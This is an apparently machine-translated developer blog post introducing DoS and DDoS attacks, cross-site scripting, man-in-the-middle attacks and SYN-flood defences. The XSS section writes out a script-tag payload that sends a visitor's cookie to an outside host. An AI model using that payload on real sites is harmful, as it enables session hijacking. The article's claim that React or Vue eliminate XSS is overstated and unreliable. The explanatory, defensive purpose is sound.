“This article has participated in the good article call order activity, click to see: back end, big front end double track submission, 20,000 yuan prize pool for you to challenge!”
Security is no small matter. In 2016, DNS provider Dyn was hit by a massive DDoS (distributed Denial of service) attack that affected 14,000 website domains. In July 2020, Hackers took control of the Twitter accounts of Musk, Gates, Obama and others, and induced users to buy Bitcoin, eventually defrauding them of $11 million. In April 2021, hackers used Github Actions (Github’s CI/CD scheme) to induce git operations to trigger malicious Bitcoin mining machines.
Especially in a country with a large population and developed Internet like China, if an Internet company’s security fails, the impact will be huge. A few years ago, there was a major security problem in our country — the user name and password of a well-known technology community was leaked on a large scale. We must learn from the past and the past.
Denial of Service attack (DoS)
Denial-of-service (DoS) attacks are common. Although the Internet is becoming more and more normalized, but there is also the use of DoS attack black black phenomenon. More common is the legend of Mir II this game’s private server, build a private server can get a large amount of illegal income, but because it is black production will often be attacked by hackers. After hacker attack, send email to administrator mailbox to ask for money again, threat user not fast dozen money will attack all the time.
In the past, DoS could be used as a common weapon to attack the valve. The principle of DoS is to use a large amount of traffic to send quickly to a website. This traffic may be at the application layer, such as a large number of HTTP requests; It can also be the transport layer, such as a large number of TCP requests. On February 18, 2018, for example, Github suffered a massive DoS attack that peaked at 1.35Tbps. Later, hackers also attacked Google, Amazon and other websites.
In order to form enough strong traffic, attackers often do not have enough economic strength to buy machines, but use viruses, Trojan machines to organize traffic attacks. These viruses in the machine, we commonly known as “chicken”. Top hackers often control a large number of broilers, a command, broilers began to frantically send network packets to the target, until the target. Because chickens are scattered around the world, this type of Attack is also known as a Distributed denial-of-service (DDoS) Attack.
The types of DDoS
There are many types of DDoS and their methods are complex.
-
An ICMP attack uses the underlying ICMP protocol to send Ping messages directly and repeatedly
-
The UPD protocol is called a UDP Flood.
-
A SYN attack that repeatedly sends SYN messages through TCP is also called a SYN attack
-
Challenge Collapsar Simulating user behavior by constantly Posting, browsing posts, browsing the web, adding shopping carts, etc.
Measures to prevent
When confronted with DDoS attacks, if you are prepared, you can be prepared. For example, if you buy a firewall, the firewall will identify the attack behaviors according to the characteristics. In this way, the attack behaviors will be filtered out, so that the system will not crash due to DDoS overload.
Of course, if it is a pure traffic attack, just rely on the firewall is not enough. Usually some large Internet companies will do multi-activity construction. Generally, the equipment rooms in two places and three places (production environment, same-city Dr Environment, and remote Dr Environment) can be switched over when DDoS occurs.
In addition, CDN often has a good effect in solving DDoS. After all, CDN is a large number of cache nodes, and DDoS cannot attack CDN. Of course, if a small team doesn’t have enough money to buy a server, they can implement a software firewall themselves. The idea is to design a proxy server with very high throughput, acting as a reverse proxy in front of all services. If a DDoS is encountered, the proxy server can recognize some characteristics and discard some traffic.
When encountering attacks, it is necessary to degrade the service appropriately, and even sacrifice some users to protect the normal use of another part of users. Firewall is based on feature recognition, itself will have a certain phenomenon of manslaughter, when being attacked, can artificially reduce the threshold to determine the attack behavior. More attack traffic is identified by allowing the firewall to cause a portion of the friendly fire.
Cross-site Scripting attacks (XSS)
Let’s talk about another type of attack — cross-site scripting.
In February 2021, a test engineer in India discovered a xS-scripting vulnerability in Apple’s iCloud website and submitted a detailed description of the vulnerability and the steps it triggered. Apple later awarded the Indian a $5,000 bonus.
Cross Site Scripting, as the name suggests, is the use of vulnerabilities to inject scripts into web pages. For example, entry boxes for submitting personal information can trigger cross-site scripting if not handled properly on the server.
Suppose you have a multi-line text input field for your personal signature. A normal user would type something interesting, but a hacker might try to type:
<script>document.createElement('img').src="https://some.site.com?cookie=document.cookie"</script>
Copy the codeIf this message is displayed on the user’s personal page, then other users accessing the user space will be attacked, and the hacker will take away the key information in the Cookie.
The XSS attack mode is simple: find a way to inject scripts into web pages. In general, the input box is a disaster area. Currently, with the development of front-end technology, pages developed using front-end frameworks such as React or Vue have eliminated the possibility of being XSS. But sometimes XSS can happen if something goes wrong. Therefore, the correct approach is to ask students from the security department to help conduct some SCANNING for XSS vulnerabilities before going online.
### Man-in-the-middle attack
Let’s talk about man-in-the-middle attacks.
Our country is at present in fighting network telecom fraud case, there is such a form. Some criminals use fake base stations, such as looking for a place with many people, with their own fake base station equipment disguised as a base station, to provide users with the network. Some people who are close to the criminals may have their phones hooked up to fake base stations. Once connected, the rogue’s pseudo base station becomes your Internet proxy and can perform many illegal operations. So, from this perspective, it wouldn’t be very difficult for a middleman to hack into a network near you and act as your “agent” online. Tech-illiterate criminals can act as middlemen by buying fake base station equipment.
In the event of a man-in-the middle attack, the Internet’s credit system, operating system, browser, etc., will take care of the last hurdle. For example, you visit Taobao shopping, middlemen to you fake web pages. Browser will go to verify the certificate of this false web page, is not the certificate of Taobao. Last year, when Github was suspected of being attacked by a man in the middle in China, many users in The country saw a phenomenon in which the browser notified them that the site they were visiting was unsafe. This is the case when the browser proofread the certificate found suspicious. If you get online encounter this kind of circumstance should choose to close this webpage immediately, do not carry on the follow-up operation, prevent to be cheated.
# # #
Living in this day and age, as individuals, cyber security is a big deal. Your ticket information, travel records, account passwords, location information, etc., all need you to have a sense of prevention, to prevent illegal elements to take away. When working for a company, take care of your account. Especially on the computer you work on, stay away from software obtained from informal sources. Once your work computer in the Trojan, became a chicken, that criminals can use your work computer as a springboard, login to the company server.
On the other hand, as a company and a team, we should also have a strong sense of security. Of course, the security field has its own expertise and talent. At the beginning of the Internet products, often can not afford expensive firewalls and the cost of hiring security experts, this time the developers need to take the initiative to learn security knowledge, as far as possible to enhance the cost of being breached. When the business grows to a certain point, it is necessary to hire security experts and buy network security equipment, including firewalls.
Ok, so with this lesson, you can now try to answer: How to defend against SYN rejection attacks?
The SYN attack is a form of DDoS attack. In this form, an attacker masquerades as a terminal and repeatedly sends SYN requests to the server. Usually, after sending the SYN, the attacker’s attacker goes offline without giving the server an ACK. The attacker keeps sending SYN’s and then goes offline, while the server waits for an ACK (usually longer than 3s). This results in a large number of connection objects accumulating on the server side.
In view of this feature, you can implement a TCP proxy (firewall). If you find the behavior of sending SYN but not sending ACK, you will disable the target IP address for a period of time. This policy can be configured as a switch and turned on when attacked. On the other hand, connection count support can be improved appropriately.